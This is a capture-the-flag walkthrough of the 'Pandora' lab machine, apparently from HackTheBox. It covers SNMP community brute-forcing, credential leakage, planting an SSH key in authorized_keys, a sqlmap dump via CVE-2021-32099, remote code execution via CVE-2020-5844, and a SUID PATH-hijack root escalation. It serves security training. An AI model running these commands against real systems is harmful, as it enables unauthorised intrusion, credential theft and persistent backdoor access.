-
The first step is to perform a scan of the open ports and then list the versions and technologies used on the open ports.
nmap -p- --open -vvv --min-rate 3000 -Pn -sS 10.10.11.136 -oG scan
/opt/extractports scan
nmap -p22,80 -Pn -sCV 10.10.11.136 -oN ports
- I found the domain
panda.htb and I add it to the file in the hosts file
- After accessing the website and browsing through it, I don’t find anything relevant, so I decide to enumerate the ports using UDP.
-
As a first step, I use brute-force to discover the community strings.
onesixtyone -c /usr/share/wordlists/seclists/Discovery/SNMP/snmp.txt 10.10.11.136
-
Having the community strings, I start to list the content and I find some credentials
snmpwalk -v2c -c public 10.10.11.136
-
I validate the credentials found by ssh and get access to the system.
-
For a greater comfort at the time of connecting to the system, I generate a key that I add to the authorized_keys file to connect by ssh.
ssh-keygen -f key
cat key.pub
echo "ssh-rsa AAAAB...SNIP...M= user@parrot" >> /home/daniel/.ssh/authorized_keys
ssh -i key daniel@10.10.11.136
- I see that the first flag can be read by user matt.
-
While searching the system for ways to perform a lateral move to the user matt, I find a website that I could not access previously. Using ssh I share port 80 to my machine to view it.
-
After pointing in the hosts file pandora.panda.htb to my ip address, I get to see a CMS v7.0NG.742_FIX_PERL2020. Searching for information about it, I find several vulnerabilities.
ssh -L 8089:localhost:80 daniel@10.10.11.136
-
The first is CVE-2021-32099 which allows SQL injection. Using this vulnerability I can read the users that are registered in the database.
sqlmap -u 'http://pandora.panda.htb:8089/pandora_console/include/chart_generator.php?session_id=*' --batch -D pandora -T tusuario -C email,id_user,is_admin.fullname,password --dump
- I am unable to break the password. I continue enumerating the different tables and I find one that contains the active sessions.
-
All of them belong to user daniel and only one to user matt. Using the latter and together with another of the existing CMS vulnerabilities (CVE-2020-5844) allows me to execute commands on the system as the user matt. I use this repository to get an interactive shell
python3 sqlpwn.py -t pandora.panda.htb:8089
- Having the terminal as the user matt I manage to read the first flag of the system.
-
Then it performs a treatment of the tty because with the current one it does not allow me to perform some commands like sudo -l. I added my ssh key following the same steps I described previously.
script /dev/null -c bash
Ctrl + z
stty raw -echo; fg
reset xterm
export SHELL=bash
export TERM=xterm
stty rows 50 columns 116
-
For privilege escalation I start by listing the binaries with SUID permissions and find one that is not common. /usr/bin/pandora_backup
-
I copy the binary to my machine and look at the strings it has. I notice that it executes the tar command using a relative path so we can perform an attack by spoofing the binary to execute a custom one.
-
I create a binary containing the command we want to execute, modify the PATH variable to point first to our directory and execute the pandora_backup binary. This way we can become root and we can read the second flag of the system.
